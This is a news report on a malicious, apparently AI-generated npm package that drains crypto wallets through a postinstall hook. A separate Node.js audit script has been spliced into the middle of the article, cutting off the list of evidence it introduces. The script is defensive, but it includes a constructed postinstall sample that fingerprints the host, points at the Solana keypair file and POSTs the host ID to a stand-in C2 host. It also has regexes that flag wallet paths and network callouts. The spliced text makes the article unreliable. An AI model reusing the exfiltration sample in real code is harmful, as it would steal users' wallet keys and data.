Security researchers have discovered a malicious npm package, apparently generated with AI, that hides malware for stealing cryptocurrency wallet data.
The package, @kodane/patch-manager, claimed to offer "advanced license checking and registry optimization tools for high-performance Node.js applications." It was uploaded to npm on July 28, 2025, by a user with the handle Kodane. The package has since been removed from the registry, but it was downloaded more than 1,500 times before removal.
Researchers note that the malicious functionality was described openly in the package's own source code, where the cryptocurrency-stealing component is labelled an "enhanced stealth wallet drainer."
The attack runs through a postinstall script that npm executes automatically once the package is installed. The script copies the payload into hidden directories on Windows, Linux, and macOS, generates an identifier for the infected machine, and connects to the command-and-control server at sweeper-monitor-production.up.railway[.]app. At the time of analysis, that server showed only two infected devices.
Once installed, the malware scans the system for cryptocurrency wallet files and, if it finds any, drains all funds to a hardcoded address on the Solana blockchain. Most transactions associated with that address are believed to have come from the compromised wallets of users who installed the package.
Crypto-stealing malware has been found in open-source repositories before, but @kodane/patch-manager stands out because the researchers believe it was generated with Anthropic's Claude. They cite the following evidence:
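As an added example (not code from the article, and not the package's own code), the following Node.js script shows how a practitioner can audit a dependency tree for the mechanism described above: packages that register install-time lifecycle hooks, and hook scripts whose bodies write to hidden directories, fingerprint the host, open outbound connections, or look for wallet key files. The package manifests and script bodies below are constructed for the demo, and the indicator regexes are illustrative heuristics rather than signatures for the real sample.

```javascript
'use strict';

// Lifecycle hooks that npm runs automatically during `npm install`
// (unless --ignore-scripts is set). A library rarely needs them.
const LIFECYCLE_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Heuristic indicators of install-time behaviour worth a human look.
// Illustrative patterns only, not signatures for any real malware.
const INDICATORS = [
  // path.join(..., '.something') -> a dot-prefixed (hidden) directory or file
  { id: 'hidden-dir-write', re: /path\.join\([^\n]*?['"`]\.[\w-]+['"`]/ },
  { id: 'host-fingerprint', re: /\bos\.(hostname|userInfo|networkInterfaces)\s*\(/ },
  { id: 'network-callout', re: /\b(https?\.(request|get)|fetch|net\.connect)\s*\(/ },
  { id: 'process-spawn', re: /\b(child_process|execSync|spawnSync?)\b/ },
  // ~/.config/solana/id.json is the Solana CLI's default keypair location
  { id: 'wallet-paths', re: /\.config\/solana|\bid\.json\b|\bkeypair\b|\bwallet\b/i },
];

const RISK_ORDER = { none: 0, low: 1, medium: 2, high: 3 };

// Return the install-time hooks a manifest declares, with their commands.
function findLifecycleHooks(manifest) {
  const scripts = (manifest && manifest.scripts) || {};
  return LIFECYCLE_HOOKS
    .filter((hook) => typeof scripts[hook] === 'string')
    .map((hook) => ({ hook, command: scripts[hook] }));
}

// Return the ids of every indicator that fires on a script body.
function scanScriptSource(source) {
  return INDICATORS.filter(({ re }) => re.test(source)).map(({ id }) => id);
}

// Extract the script file a `node <file>` hook command would execute, if any.
function scriptFileFromCommand(command) {
  const m = /\bnode\s+(?:--\S+\s+)*(\S+\.[cm]?js)\b/.exec(command);
  return m ? m[1].replace(/^\.\//, '') : null;
}

function riskLevel(hooks, indicatorCount) {
  if (hooks.length === 0) return 'none';
  if (indicatorCount >= 2) return 'high';
  if (indicatorCount === 1) return 'medium';
  return 'low';
}

// pkg = { name, version, manifest, files } where files maps a relative path
// to the file's source text (read from node_modules/<name>/ in real use).
function auditPackage(pkg) {
  const hooks = findLifecycleHooks(pkg.manifest);
  const indicators = new Set();
  for (const { command } of hooks) {
    const file = scriptFileFromCommand(command);
    // Scan the referenced script if the package ships it; otherwise scan the
    // command line itself, which also covers inline `node -e "..."` payloads.
    const source = file && pkg.files[file] !== undefined ? pkg.files[file] : command;
    for (const id of scanScriptSource(source)) indicators.add(id);
  }
  const found = [...indicators];
  return { name: pkg.name, version: pkg.version, hooks, indicators: found, risk: riskLevel(hooks, found.length) };
}

// Audit every package, keep only those with install hooks, worst risk first.
function auditDependencyTree(tree) {
  return tree.map(auditPackage)
    .filter((r) => r.risk !== 'none')
    .sort((a, b) => RISK_ORDER[b.risk] - RISK_ORDER[a.risk]);
}

// Constructed sample tree: no hooks, a benign hook, and a hook whose script
// mimics the behaviours the article describes (hidden drop dir, machine id,
// outbound connection, wallet key file). The "malicious" body is only a string.
const SAMPLE_TREE = [
  { name: 'tiny-util', version: '1.0.0', manifest: { scripts: { test: 'node test.js' } }, files: {} },
  {
    name: 'native-helper', version: '2.1.0',
    manifest: { scripts: { postinstall: 'node scripts/check-node.js' } },
    files: {
      'scripts/check-node.js':
        "const [major] = process.versions.node.split('.');\n" +
        "if (Number(major) < 18) { console.error('Node 18+ required'); process.exit(1); }\n",
    },
  },
  {
    name: 'totally-legit-optimizer', version: '0.0.3',
    manifest: { scripts: { postinstall: 'node setup.js' } },
    files: {
      'setup.js':
        "const os = require('os'); const fs = require('fs'); const path = require('path');\n" +
        "const https = require('https');\n" +
        "const dropDir = path.join(os.homedir(), '.cache-sys');\n" +
        "fs.mkdirSync(dropDir, { recursive: true });\n" +
        "const id = os.hostname() + ':' + os.userInfo().username;\n" +
        "const keyfile = path.join(os.homedir(), '.config', 'solana', 'id.json');\n" +
        "https.request({ host: 'c2.example', method: 'POST', path: '/register' }).end(id);\n",
    },
  },
];

const demoReport = auditDependencyTree(SAMPLE_TREE);
for (const r of demoReport) {
  console.log(`${r.risk.toUpperCase().padEnd(6)} ${r.name}@${r.version}  hooks=${r.hooks.map((h) => h.hook).join(',')}  indicators=${r.indicators.join(',') || '-'}`);
}
```

In real use, `SAMPLE_TREE` would be built by walking `node_modules/*/package.json` and reading the files each hook command references. The blunt mitigation that removes this whole class of attack at install time is real npm configuration, not something assumed here: `npm install --ignore-scripts`, or `ignore-scripts=true` in `.npmrc`, with lifecycle scripts re-enabled only for the specific packages that genuinely need them.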
- use of emoji;
- numerous console log messages, typical for JavaScript;
- well-written, descriptive comments in the code;
- a README.md file written in Claude's typical style;
- a tendency to describe code changes as "Enhanced".

Experts say the incident shows that attackers are using AI to produce increasingly sophisticated and dangerous malware.